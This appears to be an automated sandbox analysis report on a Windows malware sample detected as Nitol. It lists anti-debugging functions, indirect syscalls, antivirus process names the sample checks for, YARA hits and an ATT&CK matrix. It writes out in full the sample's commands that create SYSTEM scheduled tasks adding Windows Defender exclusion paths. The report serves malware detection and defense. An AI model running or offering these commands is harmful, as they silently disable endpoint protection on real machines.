                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004FD450 rdtsc 48_2_004FD450
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400073E0 LdrLoadDll,6_2_00000001400073E0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042A98F mov eax, dword ptr fs:[00000030h]48_2_0042A98F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004269BF mov eax, dword ptr fs:[00000030h]48_2_004269BF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100122C7 mov eax, dword ptr fs:[00000030h]49_2_100122C7
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000ED93 mov eax, dword ptr fs:[00000030h]49_2_1000ED93
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,6_2_0000000140004630
                Source: C:\Users\user\Documents\l0tiFM.exeProcess token adjusted: DebugJump to behavior
                Source: C:\ProgramData\53jGFr5v.exeProcess token adjusted: Debug
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001400106B0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,6_2_00000001400092E0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC32076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFBC32076E0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC3201F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC3201F50
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC3202630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFBC3202630
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_008410CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_008410CC
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_00842AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00842AE2
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_008451FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_008451FB
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B6DA7 SetUnhandledExceptionFilter,49_2_004B6DA7
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B6DB9 SetUnhandledExceptionFilter,49_2_004B6DB9
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000916B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_1000916B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000916C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_1000916C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000963F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_1000963F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000E47A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_1000E47A

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Users\user\Documents\l0tiFM.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeNtProtectVirtualMemory: Indirect: 0x2A4B253Jump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeNtDelayExecution: Indirect: 0x1B94DAJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeNtProtectVirtualMemory: Indirect: 0x2AAB253Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0041E7C9 GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetLastError,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,49_2_0041E7C9
                Source: d0oKoK2T.exe, 00000034.00000002.3349497477.000000B1FF8FF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: lBoqoqIC.exe, lBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Shell_TrayWnd
                Source: lBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: N.?AVCMenu@@TrayClockWClassTrayNotifyWndShell_TrayWnd|
                Source: d0oKoK2T.exe, 00000034.00000002.3349497477.000000B1FF8FF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: )Program Manager
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC320FD40 cpuid 6_2_00007FFBC320FD40
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: GetLocaleInfoA,6_2_000000014000F370
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: GetLocaleInfoA,44_2_00846B1A
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,49_2_004BE0FA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,49_2_004C2085
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: __EH_prolog,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,49_2_004020A1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: GetLocaleInfoA,MultiByteToWideChar,49_2_004C2142
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,49_2_004C2198
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: GetLocaleInfoW,WideCharToMultiByte,49_2_004C225B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: EnumSystemLocalesA,49_2_004BE2CF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: EnumSystemLocalesA,49_2_004BE55A
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: EnumSystemLocalesA,49_2_004BE66D
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: GetLocaleInfoA,49_2_004BE861
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000014000A370
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00405A7F GetUserNameA,49_2_00405A7F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B967E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,49_2_004B967E
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_0000000140005A70
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
                Source: DfP1K3.exe, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360safe.exe
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, 53jGFr5v.exe, 00000030.00000002.3348989985.000000000255F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Nitol
                Source: Yara matchFile source: 42.2.DfP1K3.exe.3a503e8.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 42.2.DfP1K3.exe.3a503e8.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 42.2.DfP1K3.exe.10000000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Nitol
                Source: Yara matchFile source: 42.2.DfP1K3.exe.3a503e8.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 42.2.DfP1K3.exe.3a503e8.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 42.2.DfP1K3.exe.10000000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTR
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,6_2_00000001400042B0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts14
                Native API                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		1
                Credential API Hooking                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts113
                Command and Scripting Interpreter                		43
                Windows Service                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Credential API Hooking                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts11
                Scheduled Task/Job                		11
                Scheduled Task/Job                		1
                Access Token Manipulation                		1
                Abuse Elevation Control Mechanism                		Security Account Manager1
                System Service Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts12
                Service Execution                		1
                Registry Run Keys / Startup Folder                		43
